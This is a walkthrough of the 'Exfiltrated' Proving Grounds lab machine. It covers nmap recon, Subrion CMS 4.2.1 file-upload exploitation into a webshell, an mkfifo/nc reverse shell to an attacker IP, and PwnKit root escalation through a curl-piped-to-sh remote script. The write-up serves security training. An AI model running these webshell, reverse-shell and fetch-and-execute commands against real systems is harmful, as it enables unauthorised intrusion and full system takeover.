Exfiltrated

Intro

Initial Foothold

# Nmap 7.94SVN scan initiated Fri Mar 29 10:17:34 2024 as: nmap -sC -sV -vv -oA nmap/initial exfiltrated.pg
Nmap scan report for exfiltrated.pg (192.168.172.163)
Host is up, received echo-reply ttl 61 (0.041s latency).
Scanned at 2024-03-29 10:17:34 CDT for 9s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDH6PH1/ST7TUJ4Mp/l4c7G+TM07YbX7YIsnHzq1TRpvtiBh8MQuFkL1SWW9+za+h6ZraqoZ0ewwkH+0la436t9Q+2H/Nh4CntJOrRbpLJKg4hChjgCHd5KiLCOKHhXPs/FA3mm0Zkzw1tVJLPR6RTbIkkbQiV2Zk3u8oamV5srWIJeYUY5O2XXmTnKENfrPXeHup1+3wBOkTO4Mu17wBSw6yvXyj+lleKjQ6Hnje7KozW5q4U6ijd3LmvHE34UHq/qUbCUbiwY06N2Mj0NQiZqWW8z48eTzGsuh6u1SfGIDnCCq3sWm37Y5LIUvqAFyIEJZVsC/UyrJDPBE+YIODNbN2QLD9JeBr8P4n1rkMaXbsHGywFtutdSrBZwYuRuB2W0GjIEWD/J7lxKIJ9UxRq0UxWWkZ8s3SNqUq2enfPwQt399nigtUerccskdyUD0oRKqVnhZCjEYfX3qOnlAqejr3Lpm8nA31pp6lrKNAmQEjdSO8Jxk04OR2JBxcfVNfs=
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0EdIHR7NOReMM0G7C8zxbLgwB3ump+nb2D3Pe3tXqp/6jNJ/GbU2e4Ab44njMKHJbm/PzrtYzojMjGDuBlQCg=
|   256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDCc0saExmeDXtqm5FS+D5RnDke8aJEvFq3DJIr0KZML
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 09BDDB30D6AE11E854BFF82ED638542B
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_/updates/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 10:17:43 2024 -- 1 IP address (1 host up) scanned in 8.90 seconds

Open Ports

22/tcp - OpenSSH 8.2p1 Ubuntu
80/tcp - Apache httpd 2.4.41 Ubuntu

80/tcp is running Subrion CMS v4.2.1

Subrion v4.2.1 exploits

---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting                                                         | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS                                                                          | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                                                                       | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)                                                | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                                                                        | php/webapps/45150.txt
Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)                                                           | php/webapps/51110.txt
---------------------------------------------------------------------------------------------------------------- ---------------------------------

Exploit Subrion - Arbitrary File Upload of webshell

┌──(joe㉿kali)-[~/hax/pg/exfiltrated]                                                                                                             
└─$ python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin                                                                        
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422                                                                                 
                                                                                                                                                  
[+] Trying to connect to: http://exfiltrated.offsec/panel/                                                                                        
[+] Success!                                                                                                                                      
[+] Got CSRF token: EKdNpVdsAO86ja8qWK4lLk86aPWmAYMUMstEDunx                                                                                      
[+] Trying to log in...                                                                                                                           
[+] Login Successful!                                                                                                                             
                                                                                                                                                  
[+] Generating random name for Webshell...                                                                                                        
[+] Generated webshell name: fjzvjyelbvdklzs                                                                                                      
                                                                                                                                                  
[+] Trying to Upload Webshell..                                                                                                                   
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/fjzvjyelbvdklzs.phar                                                 
                                                                                                                                                  
$ whoami                                                                                                                                          
www-data

Download and run linpeas, copy to www folder to make available for download to kali

$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/linpeas.sh

$ ls /tmp/
linpeas.sh

$ sh /tmp/linpeas.sh > /tmp/linpeas-output.txt

$ cp /tmp/linpeas-output.txt /var/www/html/subrion/

Get Reverse Shell

$ which nc
/usr/bin/nc

$ wget http://192.168.45.197:8000/ncrev.sh -O /tmp/ncrev.sh

$ sh /tmp/ncrev.sh

Contents of reverse shell script

┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ cat ncrev.sh                           
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.197 80 >/tmp/f

Listener catching shell

┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ sudo nc -lvnp 80
[sudo] password for joe: 
listening on [any] 80 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.172.163] 47826
sh: 0: can't access tty; job control turned off
$ whoami
www-data

Privilege Escalation

Linpeas output suggesting using PwnKit (CVE-2021-4034)

Running PwnKit exploit to escalate to root

$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@exfiltrated:/var/www/html/subrion/uploads$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
<.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@exfiltrated:/var/www/html/subrion/uploads# whoami
whoami
root
root@exfiltrated:/var/www/html/subrion/uploads# cat /root/proof.txt
cat /root/proof.txt
0d8a7229bdcfd3cf3bd4d86216f5e931

PreviousMuddy NextWombo

Last updated 1 year ago

hashtagIntro

hashtagInitial Foothold

hashtagPrivilege Escalation

Intro

Initial Foothold

Privilege Escalation